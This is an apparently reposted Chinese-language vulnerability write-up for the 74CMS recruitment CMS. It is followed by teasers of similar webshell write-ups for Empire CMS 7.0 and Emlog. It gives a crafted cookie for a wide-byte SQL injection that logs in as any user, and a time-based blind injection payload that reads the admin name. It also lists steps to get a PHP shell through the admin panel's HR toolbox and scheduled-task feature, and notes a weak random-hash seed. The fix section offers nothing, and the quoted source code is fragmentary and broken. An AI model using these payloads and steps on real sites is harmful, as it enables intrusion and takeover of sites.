0x1 任意使用者登入
0x2 盲注
0x3 後台拿shell
0x4 隨機函式問題
詳細說明:
0x1 任意使用者登入
user/login.php
elseif((empty($_session['uid']) || empty($_session['username']) || empty($_session['utype'])) && $_cookie['qs']['username'] && $_cookie['qs']['password'] && $_cookie['qs']['uid'])
else
} include/fun_user.php
//檢測cookie
function check_cookie($name,$pwd)' and password = ''");
if($row['num'] > 0)
else }
構造cookie如下
qs[uid] 2
qs[utype] 1
qs[password] 111111111111111111111
qs[username]%bf%27 or 1=1 %23
uid 為假冒使用者的id utype為使用者型別password任意
www.2cto.com
0x2 盲注
')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646d696e,benchmark(1000000000,(select/**/1)),1)/**/%23
上面兩個都是寬位元組注入,如果你能猜出管理員密碼,還能解出雙重md5的話,還能猜出後台路徑,繼續看下面
0x3 後台拿shell
1.先關閉csrf防禦功能
2.在hr工具箱中新增乙個偽造的doc,內容為<?php phpinfo();?>,記下路徑data/hrtools/2012/06/1339941553308.doc
3.在工具-計畫任務中新增任務,指令碼任務填../../data/hrtools/2012/06/1339941553308.doc
4.然後執行
0x4 隨機函式問題(幾乎可以無視,純屬個人yy)
在admin_common.fun.inc.php中有個$qs_pwdhash是在安裝的時候賦值的,只要能猜出就可已不用解雙重md5了。
這個$qs_pwdhash是由randstr生成
function randstr($length=6)
return $hash; }
生成長度為6的隨機數,mt_srand()播種一樣,就會得到一樣的隨機數,所以我們最多要猜1000000次就可以了(蛋疼)
漏洞證明:
修復方案:
do it yourself~
作者yy520
74CMS 騎士人才系統 幾個注入 可進後台
整套程式過濾的還是比較全面的 不過所有版本都是gbk編碼是他的硬傷 但是基本上字串入庫的時候作者都使用了iconv來把提交過來的資料編碼轉換成utf8 所以利用寬字元注入就沒辦法了 但是過濾完善僅限3.2版本之前 最新的3.2版本plus目錄多了幾個檔案 不知道是不是換了程式設計師了.先上兩個白痴注...
帝國cms 7 0後台拿shell
帝國cms7.0後台可上傳mod字尾的php檔案並執行裡面的php 進入後台 方法一 系統 資料表與系統模型 管理資料表 再隨意選擇乙個資料表,開啟對應資料表的 管理系統模型 如圖 匯入系統模型 可進入 loadinm.php 頁面,如圖 在本地新建乙個檔案,文字內容為 再命名為1.php.mod,...
Emlog後台拿webshell及修復辦法
新建乙個muma.php放置乙個一句話,然後建立乙個muma的資料夾 然後rar為zip的字尾 接著來到後台 安裝外掛程式 上傳zip檔案 成功後的路徑content plugins muma muma.php這個是主題包的路徑 一句話連線 看了一下官方演示版本 說明官方早就知道這個漏洞,但是這是使...